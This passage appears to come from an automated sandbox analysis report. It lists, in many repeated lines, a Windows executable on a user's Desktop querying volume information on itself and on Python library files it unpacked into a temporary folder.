                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\_ctypes.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-console-l1-1-0.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-datetime-l1-1-0.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-fibers-l1-1-0.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-fibers-l1-1-1.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-file-l1-1-0.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\_bz2.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\_lzma.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\select.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\_queue.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\_hashlib.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\certifi VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\certifi VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
